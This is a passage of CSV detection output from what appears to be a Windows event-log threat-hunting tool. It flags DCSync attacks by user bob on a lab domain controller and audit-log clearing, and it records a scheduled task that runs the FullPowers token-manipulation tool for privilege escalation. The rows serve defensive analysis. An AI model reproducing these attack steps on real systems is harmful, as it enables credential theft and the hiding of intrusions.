A)(A;CI;CCDCLCSWRPWPDT
LOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242589 + + + + + Security + DC1.insecurebank.local + + + + + 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + 
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c0
4fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242588 + + + + + Security + DC1.insecurebank.local + + + + + 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + 
nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;
;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 282588 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + \FullPowersTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <URI>\FullPowersTask</URI> + </RegistrationInfo> + <Triggers /> + <Principals> + <Principal id="Author"> + 
<UserId>S-1-5-19</UserId> + <RunLevel>LeastPrivilege</RunLevel> + <RequiredPrivileges> + <Privilege>SeAssignPrimaryTokenPrivilege</Privilege> + <Privilege>SeAuditPrivilege</Privilege> + <Privilege>SeChangeNotifyPrivilege</Privilege> + <Privilege>SeCreateGlobalPrivilege</Privilege> + <Privilege>SeImpersonatePrivilege</Privilege> + <Privilege>SeIncreaseQuotaPrivilege</Privilege> + <Privilege>SeIncreaseWorkingSetPrivilege</Privilege> + </RequiredPrivileges> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <StartWhenAvailable>false</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <Duration>PT10M</Duration> + <WaitTimeout>PT1H</WaitTimeout> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>false</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="Author"> + <Exec> + <Command>C:\Users\Public\Tools\TokenManip\FullPowers.exe</Command> + <Arguments>-t 4932</Arguments> + </Exec> + </Actions> +</Task> + +",MSEDGEWIN10,Security +Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 21365 + + + + + Security + wind10.winlab.local + + + + + + S-1-5-21-482804190-775995292-3801157738-1002 + admin + WIND10 + 0x47ea55 + + +",wind10.winlab.local,Security +Audit log 
cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 452811 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x17dad + + +",PC01.example.corp,Security +Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 198242566 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x8d7099 + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242602 + + + + + Security + DC1.insecurebank.local + + + + + 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + 
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;
;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 25048 + + + + + Security + alice.insecurebank.local + + + + + + S-1-5-21-1005675359-741490361-30848483-1108 + bob + insecurebank + 0x1c363a4 + 
+ +",alice.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242601 + + + + + Security + DC1.insecurebank.local + + + + + 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR
;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11
d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242600 + + + + + Security + DC1.insecurebank.local + + + + + 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + 